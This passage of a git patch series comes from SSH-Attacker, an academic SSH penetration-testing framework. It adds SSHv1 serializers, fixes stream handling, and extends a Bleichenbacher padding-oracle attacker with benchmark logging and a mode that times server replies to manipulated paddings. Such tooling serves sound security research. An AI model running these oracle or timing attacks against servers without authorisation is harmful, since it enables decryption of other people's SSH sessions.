org.apache.logging.log4j.Logger; + +public class AuthRhostsRsaMessageSSHV1Serializier + extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public AuthRhostsRsaMessageSSHV1Serializier(AuthRhostsRsaMessageSSH1 message) { + super(message); + } + + private void serializeExitStatus() { + appendInt(message.getUsername().getValue().length(), DataFormatConstants.UINT32_SIZE); + appendString(message.getUsername().getValue(), StandardCharsets.UTF_8); + appendInt(message.getClientHostKeyBits().getValue(), DataFormatConstants.UINT32_SIZE); + appendMultiPrecisionAsByteArray(message.getHostPublicExponent().getValue()); + appendMultiPrecisionAsByteArray(message.getHostPublicModulus().getValue()); + } + + @Override + public void serializeMessageSpecificContents() { + serializeExitStatus(); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AuthRsaResponseMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AuthRsaResponseMessageSSHV1Serializier.java new file mode 100644 index 000000000..62c198457 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AuthRsaResponseMessageSSHV1Serializier.java @@ -0,0 +1,33 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.AuthRsaResponseMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class AuthRsaResponseMessageSSHV1Serializier + extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public AuthRsaResponseMessageSSHV1Serializier(AuthRsaResponseMessageSSH1 message) { + super(message); + } + + private void serializeExitStatus() { + LOGGER.debug("Exit Status: {}", message.getMd5Response().getValue()); + appendInt(message.getMd5Response().getValue(), 2); + } + + @Override + public void serializeMessageSpecificContents() { + serializeExitStatus(); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/RequestCompressionMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/RequestCompressionMessageSSHV1Serializier.java new file mode 100644 index 000000000..9231ce1ab --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/RequestCompressionMessageSSHV1Serializier.java @@ -0,0 +1,34 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.constants.DataFormatConstants; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.RequestCompressionMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class RequestCompressionMessageSSHV1Serializier + extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public RequestCompressionMessageSSHV1Serializier(RequestCompressionMessageSSH1 message) { + super(message); + } + + private void serializeExitStatus() { + LOGGER.debug("CompressionState{}", message.getCompressionState().getValue()); + appendInt(message.getCompressionState().getValue(), DataFormatConstants.UINT32_SIZE); + } + + @Override + public void serializeMessageSpecificContents() { + serializeExitStatus(); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/RequestPtyMessageSSHv1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/RequestPtyMessageSSHv1Serializier.java new file mode 100644 index 000000000..db7d25593 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/RequestPtyMessageSSHv1Serializier.java @@ -0,0 +1,40 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.constants.DataFormatConstants; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.RequestPtyMessageSSH1; +import java.nio.charset.StandardCharsets; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class RequestPtyMessageSSHv1Serializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public RequestPtyMessageSSHv1Serializier(RequestPtyMessageSSH1 message) { + super(message); + } + + private void serializeData() { + appendInt( + message.getTermEnvironment().getValue().length(), DataFormatConstants.UINT32_SIZE); + appendString(message.getTermEnvironment().getValue(), StandardCharsets.UTF_8); + appendInt(message.getHightRows().getValue(), DataFormatConstants.UINT32_SIZE); + appendInt(message.getWidthColumns().getValue(), DataFormatConstants.UINT32_SIZE); + appendInt(message.getWidthPixel().getValue(), DataFormatConstants.UINT32_SIZE); + appendInt(message.getHightPixel().getValue(), DataFormatConstants.UINT32_SIZE); + appendInt(message.getTtyModes().getValue(), DataFormatConstants.UINT32_SIZE); + } + + @Override + public void serializeMessageSpecificContents() { + serializeData(); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/WindowSizeMessageSSHv1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/WindowSizeMessageSSHv1Serializier.java new file mode 100644 index 000000000..f0021c6ed --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/WindowSizeMessageSSHv1Serializier.java @@ -0,0 +1,36 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.constants.DataFormatConstants; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.WindowSizeMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class WindowSizeMessageSSHv1Serializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public WindowSizeMessageSSHv1Serializier(WindowSizeMessageSSH1 message) { + super(message); + } + + private void serializeData() { + + appendInt(message.getHightRows().getValue(), DataFormatConstants.UINT32_SIZE); + appendInt(message.getWidthColumns().getValue(), DataFormatConstants.UINT32_SIZE); + appendInt(message.getWidthPixel().getValue(), DataFormatConstants.UINT32_SIZE); + appendInt(message.getHightPixel().getValue(), DataFormatConstants.UINT32_SIZE); + } + + @Override + public void serializeMessageSpecificContents() { + serializeData(); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/X11RequestForwardMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/X11RequestForwardMessageSSHV1Serializier.java new file mode 100644 index 000000000..697eaa34b --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/X11RequestForwardMessageSSHV1Serializier.java @@ -0,0 +1,47 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.constants.DataFormatConstants; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.X11RequestForwardMessageSSH1; +import java.nio.charset.StandardCharsets; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class X11RequestForwardMessageSSHV1Serializier + extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public X11RequestForwardMessageSSHV1Serializier(X11RequestForwardMessageSSH1 message) { + super(message); + } + + private void serializeExitStatus() { + LOGGER.debug( + "Forwarding X11 Request with Authentication Protocol {}, Authentication Data {} and screen Number {} ", + message.getX11AuthenticationProtocol().getValue(), + message.getX11AuthenticationData().getValue(), + message.getScreenNumber().getValue()); + appendInt( + message.getX11AuthenticationProtocol().getValue().length(), + DataFormatConstants.UINT32_SIZE); + appendString(message.getX11AuthenticationProtocol().getValue(), StandardCharsets.UTF_8); + appendInt( + message.getX11AuthenticationData().getValue().length(), + DataFormatConstants.UINT32_SIZE); + appendString(message.getX11AuthenticationData().getValue(), StandardCharsets.UTF_8); + appendInt(message.getScreenNumber().getValue(), DataFormatConstants.UINT32_SIZE); + } + + @Override + public void serializeMessageSpecificContents() { + serializeExitStatus(); + } +} From 0631eabd1326ed32ce41b83931db069c36b80ccd Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Thu, 29 Feb 2024 23:46:48 +0100 Subject: [PATCH 156/176] Build Cleanup --- .../parser/ServerPublicKeyMessageParser.java | 25 ------------------- .../workflow/DefaultWorkflowExecutor.java | 10 +++----- .../core/workflow/WorkflowExecutor.java | 4 +-- 3 files changed, 6 insertions(+), 33 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ServerPublicKeyMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ServerPublicKeyMessageParser.java index fee5a3c12..1836ed6a9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ServerPublicKeyMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ServerPublicKeyMessageParser.java @@ -28,31 +28,6 @@ public class ServerPublicKeyMessageParser extends SshMessageParser sshActions = state.getWorkflowTrace().getSshActions(); for (SshAction action : sshActions) { - if ((state.getConfig().getStopActionsAfterDisconnect() - && isDisconnectMessageReceived())) { + if (state.getConfig().getStopActionsAfterDisconnect() + && isDisconnectMessageReceived()) { LOGGER.debug( "Skipping all ReceiveActions, received FatalAlert, StopActionsAfterFatal active"); break; } - if ((state.getConfig().getStopActionsAfterIOException() && isIoException())) { + if (state.getConfig().getStopActionsAfterIOException() && isIoException()) { LOGGER.debug( "Skipping all Actions, received IO Exception, StopActionsAfterIOException active"); break; } try { - this.executeAction(action, state); + executeAction(action, state); // TODO: Implement feature to check if message was received as expected. // We should accept unexpected messages to keep going in case something diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java index 0475a73bf..29191a44d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java @@ -145,8 +145,8 @@ protected void executeAction(SshAction action, State state) throws SkipActionExc state.setExecutionException(ex); throw ex; } catch (UnsupportedOperationException - | PreparationException - | ActionExecutionException ex) { + | PreparationException + | ActionExecutionException ex) { state.setExecutionException(ex); LOGGER.warn("Not fatal error during action execution, skipping action: {}", action, ex); throw new SkipActionException(ex); From 8b0554894c869213a04754d370f2289e3a5f270b Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Fri, 1 Mar 2024 23:36:38 +0100 Subject: [PATCH 157/176] Improving Log-Ouptut --- .../attacks/impl/BleichenbacherAttacker.java | 73 ++++++++++++------- 1 file changed, 48 insertions(+), 25 deletions(-) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java index d547d2e5b..211da714e 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java @@ -49,10 +49,9 @@ import java.io.IOException; import java.math.BigInteger; import java.security.*; -import java.util.ArrayList; -import java.util.Arrays; -import java.util.List; -import java.util.Random; +import java.time.LocalDateTime; +import java.time.format.DateTimeFormatter; +import java.util.*; import javax.crypto.NoSuchPaddingException; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -512,31 +511,23 @@ public void executeAttack() { LOGGER.info(sendSinglePacket(msg)); } + LocalDateTime dateTime = LocalDateTime.now(); + DateTimeFormatter formatter = DateTimeFormatter.ofPattern("yyyy-MM-dd HH:mm:ss"); + formatter = DateTimeFormatter.ofPattern("yyyyMMdd_HHmmss"); + String formattedDateTime = dateTime.format(formatter); + String filename = formattedDateTime + "_benchmark_results.json"; + boolean randomKeys = false; this.oracleType = config.getOracleType(); this.keyLenght = config.getKeyLenght(); - if (config.isBenchmark()) { - try { - String str = "Starting."; - File output_File = new File("benchmark_results.txt"); - FileOutputStream outputStream = new FileOutputStream(output_File, true); - byte[] strToBytes = str.getBytes(); - outputStream.write(strToBytes); - - outputStream.close(); - } catch (IOException e) { - throw new RuntimeException(e); - } - } - - try { + /* try { testDifferentPaddings(); } catch (CryptoException e) { throw new RuntimeException(e); } - System.exit(0); + System.exit(0);*/ /*if (!isVulnerable()) { LOGGER.warn("The server is not vulnerable to Manger's attack"); @@ -673,6 +664,41 @@ public void executeAttack() { } } + String attackType = "bardou"; + if (config.isClassic()) attackType = "classic"; + + if (config.isBenchmark()) { + try { + + JSONObject jo = new JSONObject(); + jo.put("plaintext", ""); + jo.put("ciphertext", ArrayConverter.bytesToRawHexString(encryptedSecret)); + jo.put("time", 0); + jo.put("inner_tries", 0); + jo.put("outer_tries", 0); + jo.put("trimmed_outer", 0); + jo.put("trimmed_inner", 0); + jo.put("outer_trimmers", 0); + jo.put("inner_trimmers", 0); + jo.put("serverkey_lenght", serverPublicKey.getModulus().bitLength()); + jo.put("hostkey_lenght", hostPublicKey.getModulus().bitLength()); + jo.put("oracle_type", oracleType.toString()); + jo.put("attack_type", attackType); + + String jsonStr = jo.toJSONString(); + + File output_File = new File(filename); + FileOutputStream outputStream = new FileOutputStream(output_File); + byte[] strToBytes = jsonStr.getBytes(); + outputStream.write(strToBytes); + + outputStream.close(); + + } catch (IOException e) { + throw new RuntimeException(e); + } + } + Bleichenbacher attacker = new Bleichenbacher(encryptedSecret, oracle, hostPublicKey, serverPublicKey); @@ -703,9 +729,6 @@ public void executeAttack() { } } - String attackType = "bardou"; - if (config.isClassic()) attackType = "classic"; - if (config.isBenchmark()) { try { JSONObject jo = new JSONObject(); @@ -725,8 +748,8 @@ public void executeAttack() { String jsonStr = jo.toJSONString(); - File output_File = new File("benchmark_results.txt"); - FileOutputStream outputStream = new FileOutputStream(output_File, true); + File output_File = new File(filename); + FileOutputStream outputStream = new FileOutputStream(output_File); byte[] strToBytes = jsonStr.getBytes(); outputStream.write(strToBytes); From 46432a896d364cf95b2c65cf7c92a0d697f70b0b Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 2 Mar 2024 15:28:31 +0100 Subject: [PATCH 158/176] [beta] improved Streamhandling --- .../pkcs1/oracles/BleichenbacherOracle.java | 1 + .../sshattacker/core/layer/ProtocolLayer.java | 24 ++++- .../SpecificReceiveLayerConfiguration.java | 4 +- .../core/layer/impl/PacketLayer.java | 91 +++++++++++-------- 4 files changed, 76 insertions(+), 44 deletions(-) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java index e1bfd5938..7a38fa948 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java @@ -110,6 +110,7 @@ private boolean[] checkPKCSConformity(final byte[] msg, int currentAttempt) { sshConfig.setWorkflowExecutorShouldClose(false); WorkflowTrace trace = BleichenbacherWorkflowGenerator.generateWorkflow(sshConfig, msg); + // ReceiveAction receiveOracleResultAction = new ReceiveAction(new DisconnectMessage()); GenericReceiveAction receiveOracleResultAction = new GenericReceiveAction(); trace.addSshAction(receiveOracleResultAction); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java index d492f3393..f8f4e6226 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java @@ -173,8 +173,18 @@ public HintedInputStream getDataStream() throws IOException { return currentInputStream; } else { LOGGER.debug("Trying to get datastream while no data is available"); + // this.receiveMoreDataForHint(null); + // <--- Testing --> receiveMoreData(); - return currentInputStream; + if (currentInputStream.available() > 0) { + return currentInputStream; + } else { + throw new EndOfStreamException( + "The original data stream does not produce any more data and there is no next datastream -> returning now"); + } + /*throw new EndOfStreamException( + "The original data stream does not produce any more data and there is no next datastream -> returning now");*/ + // return currentInputStream; } } } @@ -204,13 +214,19 @@ public boolean isDataBuffered() { public boolean shouldContinueProcessing() { if (layerConfiguration != null) { if (layerConfiguration instanceof GenericReceiveLayerConfiguration) { - return true; + // stop collecting more containers, if already got one + if (layerConfiguration.getContainerList().size() > 0) { + return false; + } else { + return true; + } + } else { return layerConfiguration.successRequiresMoreContainers( getLayerResult().getUsedContainers()) - || (isDataBuffered() + || isDataBuffered() && ((ReceiveLayerConfiguration) layerConfiguration) - .isProcessTrailingContainers()); + .isProcessTrailingContainers(); } } else { return isDataBuffered(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificReceiveLayerConfiguration.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificReceiveLayerConfiguration.java index 985856b42..6206d5868 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificReceiveLayerConfiguration.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificReceiveLayerConfiguration.java @@ -76,11 +76,11 @@ private boolean evaluateReceivedContainers( } } - for (; j < list.size(); j++) { + /* for (; j < list.size(); j++) { if (!containerCanBeFiltered(list.get(j)) && !isAllowTrailingContainers()) { return false; } - } + }*/ } return true; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java index cbccbfea1..6136e08e7 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java @@ -12,6 +12,8 @@ import de.rub.nds.sshattacker.core.constants.CompressionAlgorithm; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.constants.PacketLayerType; +import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; +import de.rub.nds.sshattacker.core.exceptions.TimeoutException; import de.rub.nds.sshattacker.core.layer.LayerConfiguration; import de.rub.nds.sshattacker.core.layer.LayerProcessingResult; import de.rub.nds.sshattacker.core.layer.ProtocolLayer; @@ -137,53 +139,66 @@ public LayerProcessingResult receiveData() { @Override public void receiveMoreData() throws IOException { - InputStream dataStream = getLowerLayer().getDataStream(); - LOGGER.debug("Available Data: {}", dataStream.available()); - AbstractPacketParser parser; - AbstractPacket packet; - if (context.getPacketLayerType() == PacketLayerType.BINARY_PACKET) { - // If we have a SSHv1 connection, parse as sshv1-packet - if (this.getHigherLayer().getLayerType().getName().equals("SSHV1")) { - parser = - new BinaryPacketParserSSHv1( - dataStream, - context.getPacketLayer().getDecryptorCipher(), - context.getReadSequenceNumber()); - packet = new BinaryPacketSSHv1(); - } else { - // If not, trade it as sshv2-packet - parser = - new BinaryPacketParser( - dataStream, - context.getPacketLayer().getDecryptorCipher(), - context.getReadSequenceNumber()); - packet = new BinaryPacket(); + try { + InputStream dataStream = null; + try { + dataStream = getLowerLayer().getDataStream(); + } catch (IOException e) { + LOGGER.warn("The lower layer did not produce a data stream: ", e); + return; } + LOGGER.debug("Available Data: {}", dataStream.available()); + AbstractPacketParser parser; + AbstractPacket packet; + if (context.getPacketLayerType() == PacketLayerType.BINARY_PACKET) { + // If we have a SSHv1 connection, parse as sshv1-packet + if (this.getHigherLayer().getLayerType().getName().equals("SSHV1")) { + parser = + new BinaryPacketParserSSHv1( + dataStream, + context.getPacketLayer().getDecryptorCipher(), + context.getReadSequenceNumber()); + packet = new BinaryPacketSSHv1(); + } else { + // If not, trade it as sshv2-packet + parser = + new BinaryPacketParser( + dataStream, + context.getPacketLayer().getDecryptorCipher(), + context.getReadSequenceNumber()); + packet = new BinaryPacket(); + } - } else if (context.getPacketLayerType() == PacketLayerType.BLOB) { - parser = new BlobPacketParser(dataStream); - packet = new BlobPacket(); - } else { - throw new RuntimeException(); - } + } else if (context.getPacketLayerType() == PacketLayerType.BLOB) { + parser = new BlobPacketParser(dataStream); + packet = new BlobPacket(); + } else { + throw new RuntimeException(); + } - parser.parse(packet); + parser.parse(packet); - LOGGER.debug("Recieved Packet: {} | {}", packet.getPayload(), packet.getCiphertext()); + LOGGER.debug("Recieved Packet: {} | {}", packet.getPayload(), packet.getCiphertext()); - decryptPacket(packet); - decompressPacket(packet); + decryptPacket(packet); + decompressPacket(packet); - LOGGER.debug( - "Decompressed Payload: {}", ArrayConverter.bytesToHexString(packet.getPayload())); + LOGGER.debug( + "Decompressed Payload: {}", + ArrayConverter.bytesToHexString(packet.getPayload())); - addProducedContainer(packet); + addProducedContainer(packet); - if (currentInputStream == null) { - // only set new input stream if necessary, extend current stream otherwise - currentInputStream = new HintedLayerInputStream(this); + if (currentInputStream == null) { + // only set new input stream if necessary, extend current stream otherwise + currentInputStream = new HintedLayerInputStream(this); + } + currentInputStream.extendStream(packet.getPayload().getValue()); + } catch (TimeoutException ex) { + LOGGER.debug(ex); + } catch (EndOfStreamException ex) { + LOGGER.debug("Reached end of stream, cannot parse more messages", ex); } - currentInputStream.extendStream(packet.getPayload().getValue()); } public PacketCipher getEncryptorCipher() { From 1b29e52680fdc95d3d956d507dd5cd538aae5618 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Thu, 28 Mar 2024 15:36:37 +0100 Subject: [PATCH 159/176] Implementing Timing-Testing for different padding-errors --- .../config/BleichenbacherCommandConfig.java | 39 ++++ .../attacks/impl/BleichenbacherAttacker.java | 170 ++++++++++++++++-- .../attacks/pkcs1/Pkcs1Attack.java | 34 ++++ .../pkcs1/oracles/BleichenbacherOracle.java | 49 ++--- .../attacks/pkcs1/oracles/Pkcs1Oracle.java | 4 + .../attacks/pkcs1/oracles/Ssh1MockOracle.java | 40 +++-- 6 files changed, 269 insertions(+), 67 deletions(-) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java index c7dbab340..75191e0e1 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java @@ -77,6 +77,29 @@ public class BleichenbacherCommandConfig extends AttackConfig { "If set, the string after this parameter will be send as packet directly to the oracle") private String sendSinglePacket = ""; + @Parameter( + names = {"-inner"}, + required = false, + description = "Choose if inner padding should be maniulated") + private boolean inner = false; + + @Parameter( + names = {"-outer"}, + required = false, + description = "Choose if inner padding should be maniulated") + private boolean outer = false; + + @Parameter( + names = {"-timing"}, + required = false, + description = "Run as Timing-Attack") + private boolean timing = false; + /** How many rescans should be done */ + @Parameter( + names = {"-intervall"}, + required = false, + description = "define, how often the timing-attack should be tested") + private int intervall = 1000; /** How many rescans should be done */ private int numberOfIterations = 3; @@ -155,4 +178,20 @@ public String getSendSinglePacket() { public boolean isClassic() { return classic; } + + public boolean isInner() { + return inner; + } + + public boolean isOuter() { + return outer; + } + + public boolean isTiming() { + return timing; + } + + public int getIntervall() { + return intervall; + } } diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java index 211da714e..6b487e24a 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java @@ -81,6 +81,13 @@ public class BleichenbacherAttacker extends Attacker lastMessage = receiveOracleResultAction.getReceivedMessages().get(0); - LOGGER.warn("Received: {}", lastMessage.toShortString()); - } catch (WorkflowExecutionException ex) { + LOGGER.warn("Received: {} in {} ns", lastMessage.toShortString(), requestTime); + + } catch (WorkflowExecutionException | IndexOutOfBoundsException ex) { LOGGER.error("got a Parser Exception"); LOGGER.info( "Server replied with unknown message -> it seems to be working correctly since the message could not be parsed"); + long finish = System.nanoTime(); + requestTime = finish - start; + LOGGER.warn("Received a fault in {} ns", requestTime); } + + sshConfig.setWorkflowExecutorShouldOpen(true); + workflowExecutor.closeConnection(); + return requestTime; + } + + public void doTimingMeasurement(int numberOfTries) { + + ArrayList longValues = new ArrayList<>(); + try { + for (int i = 0; i < numberOfTries; i++) { + longValues.add(testDifferentPaddings()); + } + // testDifferentPaddings(); + } catch (CryptoException e) { + throw new RuntimeException(e); + } + + String filename = "filename"; + String manipulatedPadding = "nothing"; + if (config.isInner()) { + filename = "inner.json"; + manipulatedPadding = "inner"; + } else if (config.isOuter()) { + filename = "outer.json"; + manipulatedPadding = "outer"; + } else { + filename = "allright.json"; + } + + JSONObject jo2 = new JSONObject(); + jo2.put("Times", longValues); + jo2.put("Padding", manipulatedPadding); + + String jsonStr2 = jo2.toJSONString(); + + File output_File2 = new File(filename); + FileOutputStream outputStream2 = null; + try { + outputStream2 = new FileOutputStream(output_File2); + byte[] strToBytes = jsonStr2.getBytes(); + outputStream2.write(strToBytes); + + outputStream2.close(); + } catch (IOException e) { + throw new RuntimeException(e); + } + + LOGGER.warn(jsonStr2); + + System.exit(0); } @Override @@ -511,23 +633,20 @@ public void executeAttack() { LOGGER.info(sendSinglePacket(msg)); } - LocalDateTime dateTime = LocalDateTime.now(); - DateTimeFormatter formatter = DateTimeFormatter.ofPattern("yyyy-MM-dd HH:mm:ss"); - formatter = DateTimeFormatter.ofPattern("yyyyMMdd_HHmmss"); - String formattedDateTime = dateTime.format(formatter); - String filename = formattedDateTime + "_benchmark_results.json"; - boolean randomKeys = false; this.oracleType = config.getOracleType(); this.keyLenght = config.getKeyLenght(); - /* try { - testDifferentPaddings(); - } catch (CryptoException e) { - throw new RuntimeException(e); + if (config.isTiming()) { + doTimingMeasurement(config.getIntervall()); } - System.exit(0);*/ + + LocalDateTime dateTime = LocalDateTime.now(); + DateTimeFormatter formatter = DateTimeFormatter.ofPattern("yyyy-MM-dd HH:mm:ss"); + formatter = DateTimeFormatter.ofPattern("yyyyMMdd_HHmmss"); + String formattedDateTime = dateTime.format(formatter); + String filename = formattedDateTime + "_benchmark_results.json"; /*if (!isVulnerable()) { LOGGER.warn("The server is not vulnerable to Manger's attack"); @@ -684,6 +803,8 @@ public void executeAttack() { jo.put("hostkey_lenght", hostPublicKey.getModulus().bitLength()); jo.put("oracle_type", oracleType.toString()); jo.put("attack_type", attackType); + jo.put("average_ms_inner_oracle", 0); + jo.put("average_ms_outer_oracle", 0); String jsonStr = jo.toJSONString(); @@ -714,6 +835,11 @@ public void executeAttack() { "It took {} tries for the inner and {} tries for the outer Bleichenbacher-Attack", attacker.getCounterInnerBleichenbacher(), attacker.getCounterOuterBleichenbacher()); + + LOGGER.info( + "Took on average {} ms for inner and {} ms for outer", + attacker.getAverageTimeforRequestInnerOracle() / 1000000, + attacker.getAverageTimeforRequestOuterOracle() / 1000000); BigInteger solution = attacker.getSolution(); byte[] solutionByteArray = ArrayConverter.bigIntegerToByteArray(solution); @@ -745,6 +871,12 @@ public void executeAttack() { jo.put("hostkey_lenght", hostPublicKey.getModulus().bitLength()); jo.put("oracle_type", oracleType.toString()); jo.put("attack_type", attackType); + jo.put( + "average_ms_inner_oracle", + attacker.getAverageTimeforRequestInnerOracle() / 1000000); + jo.put( + "average_ms_outer_oracle", + attacker.getAverageTimeforRequestOuterOracle() / 1000000); String jsonStr = jo.toJSONString(); diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Pkcs1Attack.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Pkcs1Attack.java index 10442a447..46f171247 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Pkcs1Attack.java +++ 